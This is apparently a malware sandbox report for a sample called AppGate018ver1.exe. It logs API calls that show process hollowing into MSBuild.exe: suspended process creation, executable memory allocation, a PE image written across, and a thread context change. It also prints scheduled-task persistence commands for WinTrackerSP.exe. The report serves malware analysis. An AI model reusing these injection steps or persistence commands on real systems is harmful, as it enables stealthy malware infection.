NtAllocateVirtualMemory July 20, 2024, 8:08 p.m.	process_identifier: 2924 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000264		3221225496
CreateProcessInternalW July 20, 2024, 8:08 p.m.	thread_identifier: 2068 thread_handle: 0x0000026c process_identifier: 944 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000268	1	1
NtGetContextThread July 20, 2024, 8:08 p.m.	thread_handle: 0x0000026c	1	0
NtAllocateVirtualMemory July 20, 2024, 8:08 p.m.	process_identifier: 944 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000268		3221225496
CreateProcessInternalW July 20, 2024, 8:08 p.m.	thread_identifier: 2356 thread_handle: 0x00000274 process_identifier: 2808 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000270	1	1
NtGetContextThread July 20, 2024, 8:08 p.m.	thread_handle: 0x00000274	1	0
NtAllocateVirtualMemory July 20, 2024, 8:08 p.m.	process_identifier: 2808 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000270		3221225496
CreateProcessInternalW July 20, 2024, 8:08 p.m.	thread_identifier: 1788 thread_handle: 0x0000027c process_identifier: 1780 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000278	1	1
NtGetContextThread July 20, 2024, 8:08 p.m.	thread_handle: 0x0000027c	1	0
NtAllocateVirtualMemory July 20, 2024, 8:08 p.m.	process_identifier: 1780 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000278		3221225496
CreateProcessInternalW July 20, 2024, 8:08 p.m.	thread_identifier: 2352 thread_handle: 0x0000028c process_identifier: 2668 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000288	1	1
NtGetContextThread July 20, 2024, 8:08 p.m.	thread_handle: 0x0000028c	1	0
NtAllocateVirtualMemory July 20, 2024, 8:08 p.m.	process_identifier: 2668 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000288		3221225496
NtGetContextThread July 20, 2024, 8:08 p.m.	thread_handle: 0xfffffffe	1	0
CreateProcessInternalW July 20, 2024, 8:08 p.m.	thread_identifier: 2872 thread_handle: 0x000000ec process_identifier: 2860 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000f8	1	1
CreateProcessInternalW July 20, 2024, 8:08 p.m.	thread_identifier: 3068 thread_handle: 0x00000258 process_identifier: 3060 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000250	1	1
NtResumeThread July 20, 2024, 8:08 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2368	1	0
NtResumeThread July 20, 2024, 8:08 p.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 2368	1	0
NtResumeThread July 20, 2024, 8:08 p.m.	thread_handle: 0x000001b0 suspend_count: 1 process_identifier: 2368	1	0
NtResumeThread July 20, 2024, 8:08 p.m.	thread_handle: 0x00000214 suspend_count: 1 process_identifier: 2368	1	0
CreateProcessInternalW July 20, 2024, 8:08 p.m.	thread_identifier: 2912 thread_handle: 0x0000025c process_identifier: 2920 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000260	1	1
NtGetContextThread July 20, 2024, 8:08 p.m.	thread_handle: 0x0000025c	1	0
NtAllocateVirtualMemory July 20, 2024, 8:08 p.m.	process_identifier: 2920 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000260	1	0
WriteProcessMemory July 20, 2024, 8:08 p.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $M°! Ñ`r Ñ`r Ñ`rf§þrÑ`rf§Êr2Ñ`r©ãrÑ`r©órÑ`r¨as Ñ`r ÑarÑ`rf§Ër!Ñ`rf§ýrÑ`rRich Ñ`rPELYfà ºâQÐ@$Öß@ÀSXÀSX?´ #°°#ì Ð¨.text¸º `.rdataêwÐx¾@@.dataÈE!P&6@À.rsrc° #\@@.relocÜA°#B^@B base_address: 0x00400000 process_identifier: 2920 process_handle: 0x00000260	1	1
WriteProcessMemory July 20, 2024, 8:08 p.m.	buffer: base_address: 0x00401000 process_identifier: 2920 process_handle: 0x00000260	1	1
WriteProcessMemory July 20, 2024, 8:08 p.m.	buffer: base_address: 0x0041d000 process_identifier: 2920 process_handle: 0x00000260	1	1
WriteProcessMemory July 20, 2024, 8:08 p.m.	buffer: base_address: 0x00425000 process_identifier: 2920 process_handle: 0x00000260	1	1
WriteProcessMemory July 20, 2024, 8:08 p.m.	buffer: 0 HX #Vä<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> </assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING base_address: 0x0063a000 process_identifier: 2920 process_handle: 0x00000260	1	1
WriteProcessMemory July 20, 2024, 8:08 p.m.	buffer: base_address: 0x0063b000 process_identifier: 2920 process_handle: 0x00000260	1	1
WriteProcessMemory July 20, 2024, 8:08 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2920 process_handle: 0x00000260	1	1
NtSetContextThread July 20, 2024, 8:08 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4280588 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000025c process_identifier: 2920	1	0

AppGate018ver1.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All